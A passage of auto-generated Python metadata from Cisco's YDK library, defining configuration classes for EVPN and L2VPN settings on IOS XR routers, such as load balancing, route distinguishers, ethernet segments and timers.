_MetaInfoClassMember('evi-load-balancing', REFERENCE_CLASS, 'EviLoadBalancing' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi.EviLoadBalancing',
[], [],
''' Enter EVI Loadbalancing configuration submode
''',
'evi_load_balancing',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-evi-cw-disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' CW disable for EVPN EVI
''',
'evpn_evi_cw_disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpnevi-description', ATTRIBUTE, 'str' , None, None,
[(0, 64)], [],
''' Description for EVPN EVI
''',
'evpnevi_description',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpnevibgp-auto-discovery', REFERENCE_CLASS, 'EvpnevibgpAutoDiscovery' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery',
[], [],
''' Enable Autodiscovery BGP in EVPN EVI
''',
'evpnevibgp_auto_discovery',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpnevi',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis',
False,
[
_MetaInfoClassMember('evpnevi', REFERENCE_LIST, 'Evpnevi' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi',
[], [],
''' Enter EVPN EVI configuration submode
''',
'evpnevi',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpnevis',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnLoadBalancing' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnLoadBalancing',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable EVPN Loadbalancing
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-flow-label', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Flow Label based load balancing
''',
'evpn_flow_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-load-balancing',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnbgpAutoDiscovery.EvpnRouteDistinguisher' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnbgpAutoDiscovery.EvpnRouteDistinguisher',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Two byte or 4 byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'BgpRouteDistinguisherEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteDistinguisherEnum',
[], [],
''' Router Distinguisher Type
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-route-distinguisher',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnbgpAutoDiscovery' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnbgpAutoDiscovery',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Autodiscovery BGP
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-route-distinguisher', REFERENCE_CLASS, 'EvpnRouteDistinguisher' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnbgpAutoDiscovery.EvpnRouteDistinguisher',
[], [],
''' Route Distinguisher
''',
'evpn_route_distinguisher',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpnbgp-auto-discovery',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EvpnacTimers' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EvpnacTimers',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Interface-specific timers
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpnac-peering', ATTRIBUTE, 'int' , None, None,
[('0', '300')], [],
''' Interface-specific Peering timer
''',
'evpnac_peering',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpnac-recovery', ATTRIBUTE, 'int' , None, None,
[('20', '3600')], [],
''' Interface-specific Recovery timer
''',
'evpnac_recovery',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpnac-timers',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.IdentifierType0' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.IdentifierType0',
False,
[
_MetaInfoClassMember('bytes1', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{1,8}'],
''' Type 0's 1st Byte
''',
'bytes1',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bytes23', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{1,8}'],
''' Type 0's 2nd and 3rd Bytes
''',
'bytes23',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bytes45', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{1,8}'],
''' Type 0's 4th and 5th Bytes
''',
'bytes45',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bytes67', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{1,8}'],
''' Type 0's 6th and 7th Bytes
''',
'bytes67',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bytes89', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{1,8}'],
''' Type 0's 8th and 9th Bytes
''',
'bytes89',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'identifier-type0',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving.ServiceList' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving.ServiceList',
False,
[
_MetaInfoClassMember('primary', ATTRIBUTE, 'str' , None, None,
[(0, 150)], [],
''' Primary services list
''',
'primary',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('secondary', ATTRIBUTE, 'str' , None, None,
[(0, 150)], [],
''' Secondary services list
''',
'secondary',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'service-list',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Manual service carving
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('service-list', REFERENCE_CLASS, 'ServiceList' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving.ServiceList',
[], [],
''' Manual service carving primary,secondary
lists
''',
'service_list',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'manual-service-carving',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment',
False,
[
_MetaInfoClassMember('backbone-source-mac', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Backbone Source MAC
''',
'backbone_source_mac',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Ethernet Segment
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('es-import-route-target', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' ES-Import Route Target
''',
'es_import_route_target',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('force-single-homed', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Force ethernet segment to remain
single-homed
''',
'force_single_homed',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('identifier-type0', REFERENCE_CLASS, 'IdentifierType0' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.IdentifierType0',
[], [],
''' Ethernet segment identifier (Type 0)
''',
'identifier_type0',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('load-balancing-per-service', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable per service load balancing mode
''',
'load_balancing_per_service',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('manual-service-carving', REFERENCE_CLASS, 'ManualServiceCarving' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving',
[], [],
''' Enter Manual service carving configuration
submode
''',
'manual_service_carving',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ethernet-segment',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnInterfaces.EvpnInterface',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Name of the attachment circuit interface
''',
'interface_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('ethernet-segment', REFERENCE_CLASS, 'EthernetSegment' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment',
[], [],
''' Enter Ethernet Segment configuration submode
''',
'ethernet_segment',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpnac-timers', REFERENCE_CLASS, 'EvpnacTimers' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EvpnacTimers',
[], [],
''' Enter Interface-specific timers configuration
submode
''',
'evpnac_timers',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mac-flush', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable MVRP MAC Flush mode
''',
'mac_flush',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-interface',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnInterfaces' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnInterfaces',
False,
[
_MetaInfoClassMember('evpn-interface', REFERENCE_LIST, 'EvpnInterface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface',
[], [],
''' Attachment circuit interface
''',
'evpn_interface',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-interfaces',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables',
False,
[
_MetaInfoClassMember('evpn-interfaces', REFERENCE_CLASS, 'EvpnInterfaces' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnInterfaces',
[], [],
''' Attachment Circuit interfaces
''',
'evpn_interfaces',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-load-balancing', REFERENCE_CLASS, 'EvpnLoadBalancing' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnLoadBalancing',
[], [],
''' Enter EVPN Loadbalancing configuration submode
''',
'evpn_load_balancing',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-timers', REFERENCE_CLASS, 'EvpnTimers' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnTimers',
[], [],
''' Enter EVPN timers configuration submode
''',
'evpn_timers',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpnbgp-auto-discovery', REFERENCE_CLASS, 'EvpnbgpAutoDiscovery' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnbgpAutoDiscovery',
[], [],
''' Enable Autodiscovery BGP in EVPN
''',
'evpnbgp_auto_discovery',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpnevis', REFERENCE_CLASS, 'Evpnevis' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis',
[], [],
''' Enter EVPN EVI configuration submode
''',
'evpnevis',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-tables',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn' : {
'meta_info' : _MetaInfoClass('Evpn',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable EVPN feature
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-tables', REFERENCE_CLASS, 'EvpnTables' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables',
[], [],
''' EVPN submodes
''',
'evpn_tables',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
}
_meta_table['L2Vpn.PwRouting.PwRoutingBgp.EvpnRouteDistinguisher']['meta_info'].parent =_meta_table['L2Vpn.PwRouting.PwRoutingBgp']['meta_info']
_meta_table['L2Vpn.PwRouting.PwRoutingBgp']['meta_info'].parent =_meta_table['L2Vpn.PwRouting']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S.ErpPort0']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps.Port1']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Rpl']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.None_']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.VirtualOrInterface']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits.BackupAttachmentCircuit']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns.PseudowireEvpn']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpRemoteCookie']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpSecondaryLocalCookie']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpLocalCookie']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.MplsStaticLabels']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStatic']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpRemoteCookie']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpSecondaryLocalCookie']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpLocalCookie']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.MplsStaticLabels']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStatic']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions.MonitorSession']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds.PseudowireRouted']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits.AttachmentCircuit']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect']['meta_info']
